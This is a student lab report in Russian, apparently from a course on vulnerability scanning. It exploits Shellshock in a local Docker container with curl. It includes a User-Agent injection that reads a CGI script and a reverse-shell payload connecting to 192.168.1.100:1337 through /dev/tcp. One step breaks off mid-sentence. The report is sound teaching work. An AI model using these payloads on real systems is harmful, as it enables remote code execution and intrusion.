Files
2024-03-26 19:36:57 -04:00

53 lines
1.8 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Модуль 2. Сканирование на уязвимости. Сетевые сканирования
## Практическое задание №2
### Задание №1. Детектирование Shellshock с помощью Nmap
1. Скачаем [репозиторий](https://github.com/Zenithar/docker-shellshockable) и соберем Docker-контейнер
![alt text](image.png)
2. Запустим контейнер командой `docker run -d -p 80:80 --name shellshock marker689/shellshockable`
3. Посмотрим вывод CGI-скрипта.
```
curl http://localhost/cgi-bin/shockme.cgi
```
![alt text](image-1.png)
Вывод соответствует коду в CGI-скрипте:
```bash
#!/usr/local/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
```
4. Выполним эксплуатацию уязвимости Shellshock
`curl -A "() { test;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /usr/lib/cgi-bin/shockme.cgi" http://localhost/cgi-bin/shockme.cgi`
![alt text](image-2.png)
```bash
#!/usr/local/bin/bash
echo "Content-type: text/html"
echo ""
echo "https://shellshocker.net/"
```
Мы раскрыли содержимое скрипта, также можно сделать ревер-шелл.
5. `curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.1.100/1337 0>&1'" http://localhost/cgi-bin/shockme.cgi`
![alt text](image-3.png)
6. Приступим к написанию
# Итог лабораторной работы
На этом лабораторная работа окончена, файл отчет в формате pdf во вложении.
Выполнил: Харитонов Марат Русланович, студенческий билет №М235314.